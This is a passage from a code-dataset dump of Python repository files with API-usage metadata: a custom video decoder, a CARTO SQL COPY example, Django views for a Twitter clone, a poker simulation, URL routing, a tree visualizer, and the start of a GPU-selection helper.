40, "usage_type": "call"}, {"api_name": 
"flask.render_template", "line_number": 54, "usage_type": "call"}, {"api_name": "forms.PostForm", "line_number": 59, "usage_type": "call"}, {"api_name": "flask_login.current_user.name", "line_number": 67, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 67, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 73, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 77, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 77, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 79, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 57, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 87, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 88, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 88, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 92, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 96, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 82, "usage_type": "name"}, {"api_name": "flask_login.current_user.is_admin", "line_number": 105, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 105, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 106, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 108, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 108, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 101, "usage_type": "name"}, {"api_name": "flask_login.current_user.is_admin", "line_number": 113, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 113, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 114, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 114, "usage_type": "call"}, {"api_name": "forms.SignupForm", "line_number": 116, "usage_type": "call"}, {"api_name": "hashlib.md5", "line_number": 124, "usage_type": "call"}, {"api_name": "models.User", "line_number": 126, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 134, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 134, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 134, "usage_type": "name"}, {"api_name": "werkzeug.urls.url_parse", "line_number": 136, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 137, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 139, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 140, "usage_type": "call"}, {"api_name": "flask_login.current_user.is_admin", "line_number": 145, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 145, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 146, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 146, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 148, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 152, "usage_type": "call"}, {"api_name": "models.User.getUsers", "line_number": 153, "usage_type": "call"}, {"api_name": "models.User", "line_number": 153, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 158, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 158, "usage_type": "name"}, {"api_name": 
"models.User.deleteUser", "line_number": 160, "usage_type": "call"}, {"api_name": "models.User", "line_number": 160, "usage_type": "name"}, {"api_name": "flask_login.current_user.is_authenticated", "line_number": 166, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 166, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 167, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 167, "usage_type": "call"}, {"api_name": "forms.LoginForm", "line_number": 169, "usage_type": "call"}, {"api_name": "models.User.get_by_email", "line_number": 173, "usage_type": "call"}, {"api_name": "models.User", "line_number": 173, "usage_type": "name"}, {"api_name": "models.User", "line_number": 177, "usage_type": "call"}, {"api_name": "flask_login.login_user", "line_number": 180, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 182, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 182, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 182, "usage_type": "name"}, {"api_name": "werkzeug.urls.url_parse", "line_number": 184, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 185, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 187, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 188, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 194, "usage_type": "call"}, {"api_name": "flask_login.logout_user", "line_number": 196, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 197, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 197, "usage_type": "call"}, {"api_name": "models.User.get_by_id", "line_number": 201, "usage_type": "call"}, {"api_name": "models.User", "line_number": 201, "usage_type": "name"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 204, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 204, "usage_type": "attribute"}, {"api_name": "flask.request.get_json", "line_number": 209, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 209, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 219, "usage_type": "call"}]} +{"seq_id": "1550574021", "text": "import cv2\nimport numpy as np\n\n\nhead_codec_tag = \"16KC\"\nhead_tag_idx = (0, 4)\nhead_frame_count_idx = (4, 8)\nhead_frame_rate_idx = (8, 10)\nhead_width_idx = (10, 14)\nhead_height_idx = (14, 18)\nhead_object_number_idx = (18, 22)\n\nbytes_in_head = 18 # Without the number of objects 18, with it 22 bytes\nbytes_in_frame_data = 26\n\nframe_count = None\nframe_rate = None\nframe_width = None\nframe_height = None\n\n\n\n\n\ndef decode_head(bytes_array):\n\tglobal frame_count\n\tglobal frame_rate\n\tglobal frame_width\n\tglobal frame_height\n\t\n\ttag = bytes_array[head_tag_idx[0]:head_tag_idx[1]].decode(\"utf-8\")\n\tif tag != head_codec_tag:\n\t\traise Exception(\"The input file is not a 16k codec video (16KC)\")\n\n\tframe_count = int.from_bytes(bytes_array[head_frame_count_idx[0] : head_frame_count_idx[1]], byteorder='big')\n\tframe_rate = int.from_bytes(bytes_array[head_frame_rate_idx[0] : head_frame_rate_idx[1]], byteorder='big')\n\tframe_width = int.from_bytes(bytes_array[head_width_idx[0] : head_width_idx[1]], byteorder='big')\n\tframe_height = int.from_bytes(bytes_array[head_height_idx[0] : head_height_idx[1]], byteorder='big')\n\t# total_object_number = int.from_bytes(bytes[head_object_number_idx[0] : 
head_object_number_idx[1]], byteorder='little')\n\n\treturn (frame_count, frame_rate, frame_width, frame_height)\n\n\n\n\ndef decode_background(bytes_array):\n\tglobal frame_width\n\tglobal frame_height\n\n\tif frame_height is None or frame_width is None:\n\t\traise Exception(\"Something went wrong at decode_background() ==> heigth or width is None\")\n\n\tnp_arr = np.fromstring(bytes_array, np.uint8)\n\tbackground = cv2.imdecode(np_arr, cv2.IMREAD_COLOR)\n\treturn background\n\n\ndef decode_texture_atlas(bytes_array):\n\tnp_arr = np.fromstring(bytes_array, np.uint8)#.reshape(frame_height, frame_width, 3)\n\ttexture_atlas = cv2.imdecode(np_arr, cv2.IMREAD_COLOR)\n\treturn texture_atlas\n\n\n\n# MAIN METHOD\n\ndef decode_file(filename):\n\tglobal frame_count\n\tglobal frame_rate\n\tglobal frame_width\n\tglobal frame_height\n\n\tfile = filename\n\n\tf = open(file, 'rb')\n\n\t# Read head\n\tbyte_arr = f.read(bytes_in_head) \n\tframe_count, frame_rate, frame_width, frame_height = decode_head(byte_arr)\n\n\t# Read the background\n\tbackground_size = int.from_bytes(f.read(4), byteorder='big')\n\tbyte_arr = f.read(background_size)\n\tbackground = decode_background(byte_arr)\n\n\n\t# Read frames\n\tfor i in range(0,frame_count-1):\n\t\tcanvas = np.array(background)\n\n\t\t# Read frame data\n\t\tframe_data_element_count = int.from_bytes(f.read(4), byteorder='big')\n\t\tframe_data = []\n\t\tfor e in range(0, frame_data_element_count):\n\t\t\tframe_data_row = f.read(bytes_in_frame_data)\n\t\t\tobj_id = int.from_bytes(frame_data_row[0:2], byteorder='big')\n\t\t\tobj_tex_x = int.from_bytes(frame_data_row[2:6], byteorder='big')\n\t\t\tobj_tex_y = int.from_bytes(frame_data_row[6:10], byteorder='big')\n\t\t\tobj_tex_w = int.from_bytes(frame_data_row[10:14], byteorder='big')\n\t\t\tobj_tex_h = int.from_bytes(frame_data_row[14:18], byteorder='big')\n\t\t\tobj_v_x = int.from_bytes(frame_data_row[18:22], byteorder='big')\n\t\t\tobj_v_y = int.from_bytes(frame_data_row[22:26], byteorder='big')\n\t\t\tframe_data.append([obj_id, obj_tex_x, obj_tex_y, obj_tex_w, obj_tex_h, obj_v_x, obj_v_y])\n\n\t\t# Read the texture atlas\n\t\ttexture_atlas_size = int.from_bytes(f.read(4), byteorder='big')\n\t\tbyte_arr = f.read(texture_atlas_size)\n\t\ttexture_atlas = decode_texture_atlas(byte_arr)\n\n\t\t# Add objects to the canvas\n\t\tfor e in frame_data:\n\t\t\tv_coords = (e[5], e[6])\n\t\t\tw = e[3]\n\t\t\th = e[4]\n\t\t\ttex_coords = (e[1], e[2])\n\t\t\tcanvas[v_coords[0]:v_coords[0]+h, v_coords[1]:v_coords[1]+w] = texture_atlas[tex_coords[0]:tex_coords[0]+h, tex_coords[1]:tex_coords[1]+w]\n\t\tcv2.imshow(\"img\", canvas)\n\t\tcv2.waitKey(30)\n\tcv2.destroyAllWindows()\n\n\tf.close()\n\n", "repo_name": "MEC402/16kcPlayer", "sub_path": "decoder.py", "file_name": "decoder.py", "file_ext": "py", "file_size_in_byte": 3692, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.fromstring", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 53, "usage_type": "attribute"}, {"api_name": "cv2.imdecode", "line_number": 54, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.fromstring", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 59, "usage_type": "attribute"}, {"api_name": "cv2.imdecode", "line_number": 60, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 60, "usage_type": 
"attribute"}, {"api_name": "numpy.array", "line_number": 89, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 117, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 118, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 119, "usage_type": "call"}]} +{"seq_id": "70661321794", "text": "import argparse\nimport os\nimport sys\nimport logging\nimport pandas as pd\n\nfrom carto.auth import APIKeyAuthClient\nfrom carto.sql import SQLClient\nfrom carto.sql import CopySQLClient\n\n# Logger (better than print)\nlogging.basicConfig(\n level=logging.INFO,\n format=' %(asctime)s - %(levelname)s - %(message)s',\n datefmt='%I:%M:%S %p')\nlogger = logging.getLogger()\n\n\n# set input arguments\nparser = argparse.ArgumentParser(description='Example of CopySQLClient usage with COPY feature and pandas (file-based interface)')\n\nparser.add_argument('--base_url', type=str, dest='CARTO_BASE_URL',\n default=os.environ.get('CARTO_API_URL', ''),\n help='Set the base URL. For example:' +\n ' https://username.carto.com/ ' +\n '(defaults to env variable CARTO_API_URL)')\n\nparser.add_argument('--api_key', dest='CARTO_API_KEY',\n default=os.environ.get('CARTO_API_KEY', ''),\n help='Api key of the account' +\n ' (defaults to env variable CARTO_API_KEY)')\n\n\nargs = parser.parse_args()\n\n# Set authentification to CARTO\nif args.CARTO_BASE_URL and args.CARTO_API_KEY:\n auth_client = APIKeyAuthClient(\n args.CARTO_BASE_URL, args.CARTO_API_KEY)\nelse:\n logger.error('You need to provide valid credentials, run with '\n '-h parameter for details')\n sys.exit(1)\n\n# Create and cartodbfy a table\nsqlClient = SQLClient(auth_client)\nsqlClient.send(\"\"\"\n CREATE TABLE IF NOT EXISTS copy_example (\n the_geom geometry(Geometry,4326),\n name text,\n age integer\n )\n \"\"\")\nsqlClient.send(\"SELECT CDB_CartodbfyTable(current_schema, 'copy_example')\")\n\ncopyClient = CopySQLClient(auth_client)\n\n# COPY FROM example\nlogger.info(\"COPY'ing FROM file...\")\nquery = ('COPY copy_example (the_geom, name, age) '\n 'FROM stdin WITH (FORMAT csv, HEADER true)')\nresult = copyClient.copyfrom_file_path(query, 'files/copy_from.csv')\nlogger.info('result = %s' % result)\n\n# COPY TO example with pandas DataFrame\nlogger.info(\"COPY'ing TO pandas DataFrame...\")\nquery = 'COPY copy_example TO stdout WITH (FORMAT csv, HEADER true)'\nresult = copyClient.copyto_stream(query)\ndf = pd.read_csv(result)\nlogger.info(df.head())\n\n# Truncate the table to make this example repeatable\nsqlClient.send('TRUNCATE TABLE copy_example RESTART IDENTITY')\n", "repo_name": "CartoDB/carto-python", "sub_path": "examples/copy_and_pandas_example.py", "file_name": "copy_and_pandas_example.py", "file_ext": "py", "file_size_in_byte": 2373, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 154, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.basicConfig", "line_number": 12, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 13, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 16, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 20, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 23, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 29, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 29, "usage_type": "attribute"}, {"api_name": "carto.auth.APIKeyAuthClient", 
"line_number": 38, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 43, "usage_type": "call"}, {"api_name": "carto.sql.SQLClient", "line_number": 46, "usage_type": "call"}, {"api_name": "carto.sql.CopySQLClient", "line_number": 56, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 69, "usage_type": "call"}]} +{"seq_id": "70063392195", "text": "from typing import List\n\nfrom django.http import JsonResponse\n\nfrom modules.tweets.models import Tweet, ResponseUserLikedTweet\nfrom modules.tweets.serializers import (\n TweetPublicSerializer,\n UserTweetPublicLikesSerializer,\n)\nfrom modules.users.serializers import UserPublicInfoSerializer\nfrom modules.users.models import User\n\nfrom rest_framework import generics, status\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework_simplejwt.tokens import AccessToken\n\n\nclass UserBaseApi(generics.GenericAPIView):\n \"\"\"base class for user api views\"\"\"\n\n permission_classes = (IsAuthenticated,)\n serializer_class = None\n\n def get_queryset(self) -> User:\n pass\n\n def list(self, request, username: str, *args, **kwargs):\n \"\"\"return list of user tweet with pagination\"\"\"\n try:\n # serialize data from database and paginate\n # by default, paginate by 10\n queryset = self.filter_queryset(self.get_queryset(username))\n serializer = self.get_serializer(queryset, many=True)\n\n return JsonResponse(serializer.data, status=status.HTTP_200_OK, safe=False)\n except Exception as ex:\n return JsonResponse({\"detail\": ex.args}, status=status.HTTP_400_BAD_REQUEST)\n\n def retrive_token(self, request) -> AccessToken:\n \"\"\"get token from authorization header\"\"\"\n tokens = request.META.get(\"HTTP_AUTHORIZATION\", \" \").split()[-1]\n access = AccessToken(tokens)\n return access\n\n\nclass UserPublicInfoVuew(UserBaseApi):\n \"\"\"view for user public info\"\"\"\n\n serializer_class = UserPublicInfoSerializer\n\n def get_queryset(self, username: str) -> User:\n \"\"\"get user querset\"\"\"\n return User.objects.get(username=username, is_active=True)\n\n def get(self, request, username: str, *args, **kwargs):\n \"\"\"get user public info\"\"\"\n try:\n queryset = self.get_queryset(username)\n serializer = self.get_serializer(queryset)\n return JsonResponse(serializer.data, status=status.HTTP_200_OK, safe=False)\n except Exception as ex:\n return JsonResponse({\"detail\": ex.args}, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass UserPublicTweetView(UserBaseApi):\n \"\"\"user public tweet api views\n methods: get, delete\n \"\"\"\n\n serializer_class = TweetPublicSerializer\n\n def get_queryset(self, username: str) -> List[Tweet]:\n \"\"\"return list of user tweet\"\"\"\n return (\n User.objects.get(username=username, is_active=True)\n .tweets.all()\n .order_by(\"-created_at\")\n )\n\n def get(self, request, username: str, *args, **kwargs):\n \"\"\"return list of user tweeted tweets\"\"\"\n return self.list(request, username, *args, **kwargs)\n\n\nclass UserPublicMediaView(UserBaseApi):\n \"\"\"user public tweet medias api views\n methods: get\n \"\"\"\n\n serializer_class = TweetPublicSerializer\n\n def get_queryset(self, username: str) -> List[Tweet]:\n \"\"\"return list of user tweet\"\"\"\n return (\n User.objects.get(username=username, is_active=True)\n .tweets.all()\n .exclude(pictures=\"\")\n .order_by(\"-created_at\")\n )\n\n def get(self, request, username: str, *args, **kwargs):\n \"\"\"return list of user tweeted medias\"\"\"\n return self.list(request, username, *args, 
**kwargs)\n\n\nclass UserPublicReplyView(UserBaseApi):\n \"\"\"user public tweet replies api views\n methods: get\n \"\"\"\n\n serializer_class = TweetPublicSerializer\n\n def get_queryset(self, username: str) -> List[Tweet]:\n \"\"\"return list of user tweet\"\"\"\n return (\n User.objects.get(username=username, is_active=True)\n .commented_tweets.all()\n .order_by(\"-created_at\")\n )\n\n def get(self, request, username: str, *args, **kwargs):\n \"\"\"return list of user tweeted replies\"\"\"\n return self.list(request, username, *args, **kwargs)\n\n\nclass UserPublicLikesView(UserBaseApi):\n \"\"\"user public tweet likes api views\n methods: get\n \"\"\"\n\n serializer_class = UserTweetPublicLikesSerializer\n\n def list(self, request, username: str, *args, **kwargs):\n \"\"\"return list of user tweet with pagination\"\"\"\n try:\n # serialize data from database and paginate\n # by default, paginate by 10\n queryset = self.filter_queryset(self.get_queryset(username))\n serializer = self.get_serializer(\n queryset, many=True, context={\"request\": request}\n )\n\n return JsonResponse(serializer.data, status=status.HTTP_200_OK, safe=False)\n except Exception as ex:\n return JsonResponse({\"detail\": ex.args}, status=status.HTTP_400_BAD_REQUEST)\n\n def get_queryset(self, username: str) -> List[ResponseUserLikedTweet]:\n \"\"\"return list of user tweet\"\"\"\n return (\n User.objects.get(username=username, is_active=True)\n .liked_tweet.all()\n .order_by(\"-created_at\")\n )\n\n def get(self, request, username: str, *args, **kwargs):\n \"\"\"return list of user tweeted replies\"\"\"\n return self.list(request, username, *args, **kwargs)\n\n\nuser_info = UserPublicInfoVuew.as_view()\nuser_tweets = UserPublicTweetView.as_view()\nuser_medias = UserPublicMediaView.as_view()\nuser_replies = UserPublicReplyView.as_view()\nuser_likes = UserPublicLikesView.as_view()\n", "repo_name": "jirenmaa/twitter-clone", "sub_path": "modules/users/index.py", "file_name": "index.py", "file_ext": "py", "file_size_in_byte": 5462, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "61", "api": [{"api_name": "rest_framework.generics.GenericAPIView", "line_number": 18, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 18, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 21, "usage_type": "name"}, {"api_name": "modules.users.models.User", "line_number": 24, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 35, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 35, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 35, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 37, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 37, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 37, "usage_type": "name"}, {"api_name": "rest_framework_simplejwt.tokens.AccessToken", "line_number": 42, "usage_type": "call"}, {"api_name": "rest_framework_simplejwt.tokens.AccessToken", "line_number": 39, "usage_type": "name"}, {"api_name": "modules.users.serializers.UserPublicInfoSerializer", "line_number": 49, "usage_type": "name"}, {"api_name": "modules.users.models.User.objects.get", "line_number": 53, "usage_type": "call"}, {"api_name": "modules.users.models.User.objects", "line_number": 53, "usage_type": 
"attribute"}, {"api_name": "modules.users.models.User", "line_number": 53, "usage_type": "name"}, {"api_name": "modules.users.models.User", "line_number": 51, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 60, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 60, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 60, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 62, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 62, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 62, "usage_type": "name"}, {"api_name": "modules.tweets.serializers.TweetPublicSerializer", "line_number": 70, "usage_type": "name"}, {"api_name": "modules.users.models.User.objects.get", "line_number": 75, "usage_type": "call"}, {"api_name": "modules.users.models.User.objects", "line_number": 75, "usage_type": "attribute"}, {"api_name": "modules.users.models.User", "line_number": 75, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 72, "usage_type": "name"}, {"api_name": "modules.tweets.models.Tweet", "line_number": 72, "usage_type": "name"}, {"api_name": "modules.tweets.serializers.TweetPublicSerializer", "line_number": 90, "usage_type": "name"}, {"api_name": "modules.users.models.User.objects.get", "line_number": 95, "usage_type": "call"}, {"api_name": "modules.users.models.User.objects", "line_number": 95, "usage_type": "attribute"}, {"api_name": "modules.users.models.User", "line_number": 95, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 92, "usage_type": "name"}, {"api_name": "modules.tweets.models.Tweet", "line_number": 92, "usage_type": "name"}, {"api_name": "modules.tweets.serializers.TweetPublicSerializer", "line_number": 111, "usage_type": "name"}, {"api_name": "modules.users.models.User.objects.get", "line_number": 116, "usage_type": "call"}, {"api_name": "modules.users.models.User.objects", "line_number": 116, "usage_type": "attribute"}, {"api_name": "modules.users.models.User", "line_number": 116, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 113, "usage_type": "name"}, {"api_name": "modules.tweets.models.Tweet", "line_number": 113, "usage_type": "name"}, {"api_name": "modules.tweets.serializers.UserTweetPublicLikesSerializer", "line_number": 131, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 143, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 143, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 143, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 145, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 145, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 145, "usage_type": "name"}, {"api_name": "modules.users.models.User.objects.get", "line_number": 150, "usage_type": "call"}, {"api_name": "modules.users.models.User.objects", "line_number": 150, "usage_type": "attribute"}, {"api_name": "modules.users.models.User", "line_number": 150, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 147, "usage_type": "name"}, {"api_name": "modules.tweets.models.ResponseUserLikedTweet", "line_number": 147, "usage_type": "name"}]} +{"seq_id": "24735425907", "text": "from learner import Table\nimport matplotlib.pyplot as plt\nfrom 
learner.templates import simulate, BasicPlayer\nfrom sklearn.ensemble import GradientBoostingRegressor\n\nif __name__ == '__main__':\n\n # 建立Table,小盲注为1,大盲注为2,最大下注为200\n # Create a table with a small blind of 1, a big blind of 2 and a maximum bet of 200\n t = Table(smallBlind=1, bigBlind=2, maxBuyIn=200)\n\n # 建立player\n # Create player\n players = []\n\n # 建立4个玩家\n # Create 4 players\n for i in range(4):\n r = GradientBoostingRegressor()\n name = 'Player ' + str(i+1)\n p = BasicPlayer(name=name, reg=r, bankroll=10**6, nRaises=10, rFactor=.7, memory=10**5)\n players.append(p)\n\n for p in players:\n t.addPlayer(p)\n\n # 模拟20000手并保存每个玩家的bankroll\n # Simulate 20,000 hands and save bankroll for each player\n\n bankrolls = simulate(t, nHands=20000, nTrain=0, nBuyIn=10)\n\n # 可视化\n # Visualization\n for i in range(4):\n bankroll = bankrolls[i]\n plt.plot(range(len(bankroll)), bankroll, label=players[i].getName())\n plt.title('Player bankroll vs Hands played') \n plt.xlabel('Hands played')\n plt.ylabel('Player bankroll/wealth')\n plt.legend(loc='upper left')\n plt.show()\n", "repo_name": "GkiwiXiao/Poeker", "sub_path": "code/poker/bankroll_demo.py", "file_name": "bankroll_demo.py", "file_ext": "py", "file_size_in_byte": 1304, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "learner.Table", "line_number": 10, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingRegressor", "line_number": 19, "usage_type": "call"}, {"api_name": "learner.templates.BasicPlayer", "line_number": 21, "usage_type": "call"}, {"api_name": "learner.templates.simulate", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}]} +{"seq_id": "8730170569", "text": "from django.conf.urls import patterns, include, url\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\n\n\n\n\nurlpatterns = patterns('',\n url(r'^api/1/', include('zooapi.urls')),\n url(r'^', include('zoo.urls')),\n)\n\nurlpatterns += staticfiles_urlpatterns()", "repo_name": "perldev/zoo", "sub_path": "web/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 277, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.conf.urls.patterns", "line_number": 7, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": 
"django.conf.urls.include", "line_number": 9, "usage_type": "call"}, {"api_name": "django.contrib.staticfiles.urls.staticfiles_urlpatterns", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "31936507483", "text": "import networkx as nx\r\nimport matplotlib.pyplot as plt\r\nimport os\r\n\r\n\r\ndef create_graph(G, node, pos={}, x=0, y=0, layer=1):\r\n pos.update({node.val: (x, y)})\r\n if node.left:\r\n G.add_edge(node.val, node.left.val)\r\n l_x, l_y = x - 10 / 2 ** layer, y - 1\r\n l_layer = layer + 1\r\n create_graph(G, node.left, x=l_x, y=l_y, pos=pos, layer=l_layer)\r\n if node.right:\r\n G.add_edge(node.val, node.right.val)\r\n r_x, r_y = x + 10 / 2 ** layer, y - 1\r\n r_layer = layer + 1\r\n create_graph(G, node.right, x=r_x, y=r_y, pos=pos, layer=r_layer)\r\n return (G, pos)\r\n\r\n\r\ndef draw(node):\r\n graph = nx.DiGraph()\r\n graph, pos = create_graph(graph, node)\r\n _, ax = plt.subplots(figsize=(80, 30))\r\n nx.draw_networkx(graph, pos, ax=ax, node_size=1000)\r\n if not os.path.exists(\"img\"):\r\n os.mkdir(\"img\")\r\n plt.savefig(\"img/test.jpg\")\r\n", "repo_name": "xcmyz/ExpressionTransformation", "sub_path": "visualize.py", "file_name": "visualize.py", "file_ext": "py", "file_size_in_byte": 899, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "networkx.DiGraph", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "networkx.draw_networkx", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}]} +{"seq_id": "25576373575", "text": "import pynvml\nimport os \n\n\ndef autoset_nvgpu(metric=\"memory\", k=1):\n \"\"\"autoset_nvgpu\n automatically set NVIDIA GPU device\n\n Args:\n metric (str): memory/utilization\n select the GPU with min(metric)\n k (int): num. 
